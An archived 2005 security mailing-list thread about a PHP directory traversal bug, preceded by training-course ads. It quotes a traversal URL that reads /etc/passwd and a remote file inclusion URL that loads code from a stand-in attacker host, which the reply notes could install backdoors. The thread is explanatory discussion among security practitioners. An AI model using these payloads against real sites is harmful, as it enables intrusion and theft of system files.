Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Web-App-Sec
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: PHP Directory Transversal

from [Andres Molinetti] Network Security [Permanent Link]
Subject: Re: PHP Directory Transversal
Date: Mon, 14 Mar 2005 17:02:38 +0000 
It seems that the problem was that it had "safe_mode" on....

Thank you all for the replies!

Cheers, Andy

From: John GALLET <john.gallet@wanadoo.fr>
To: Andres Molinetti <andymolinetti@hotmail.com>
CC: pen-test@securityfocus.com, <webappsec@securityfocus.com>
Subject: Re: PHP Directory Transversal
Date: Mon, 14 Mar 2005 09:06:25 +0100 (CET)

Hi there,

> Therefore, I tried doing a
> www.example.com/static.php?page=../../../../../../etc/passwd
> but I get an error saying that file doesn't exist.
> I user the same source code in my server, and I could retrieve the
> file...what can be happening? I don't think it is under a chroot jail...

What you can or can not read depends on the configuration of php
(include_path vs safe mode for example). Have a look at :
http://fr3.php.net/features.safe-mode

Now the real risk is not so much reading some source code as executing
some other people's code.

www.example.com/static.php?page=http://evilcracker.com/evil_code.txt
has good chances of also getting executed, which opens the path to
install any backdoor, download perl scripts/trojans, etc...

HTH
JG




_________________________________________________________________
Un amor, una aventura, compañía para un viaje. Regístrate gratis en MSN Amor & Amistad. http://match.msn.es/match/mt.cfm?pg=channel&tcid=162349

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: Web security breach changes the lives of 119 people, El C0chin0
Next by Date:  RE: calling all software security tool vendors/freeware/open source project leads, Evans, Arian
Previous by Thread:  Re: PHP Directory Transversal, John GALLET
Next by Thread:  Re: PHP Directory Transversal, Alex 'CAVE' Cernat
Indexes:  [Date] [Thread] [Top] [All Lists]